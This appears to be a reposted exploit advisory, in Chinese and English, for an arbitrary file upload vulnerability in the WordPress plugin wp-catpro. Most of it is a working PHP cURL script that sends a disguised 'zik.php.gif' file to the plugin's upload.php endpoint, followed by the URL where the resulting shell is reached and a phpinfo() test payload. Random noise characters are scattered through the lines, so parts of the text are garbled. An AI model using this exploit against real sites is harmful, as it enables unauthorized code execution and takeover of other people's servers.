WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

作者  => Zikou-16
邮箱 => zikou16x@gmail.com
* v. \6 J# ?# [0 k* b8 p! l5 ?; p测试系统 : Windows 7 , Backtrack 5r3
2 V4 c# m+ J/ D3 h1 s! W: Z下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
. d$ s4 |. d2 W7 o
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
! M, Q# I3 C% a9 u# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
, I; N7 M# R! L1 z-----------
$ o, q1 V7 Z3 J' j& \<?php
. B0 r  k8 x! G4 N4 R, B( R6 Z/ Z) ^
0 ~4 t& H3 C- G, ~) O& j4 g$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
2 Q/ t4 p& a0 gcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

, Y- d0 ?, h0 i  C0 f0 ~/ C" sprint "$postResult";
! m8 v7 @  A: o/ L) j% `) c
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
1 q% x% I7 h7 W. o4 T2 q) K  ?>
' a8 c- f; L$ O$ U4 p. d- I7 H<?php
1 z5 J# P  E5 u% q, z% s* j+ F- tphpinfo();
: i9 _. k1 {) Z( J?>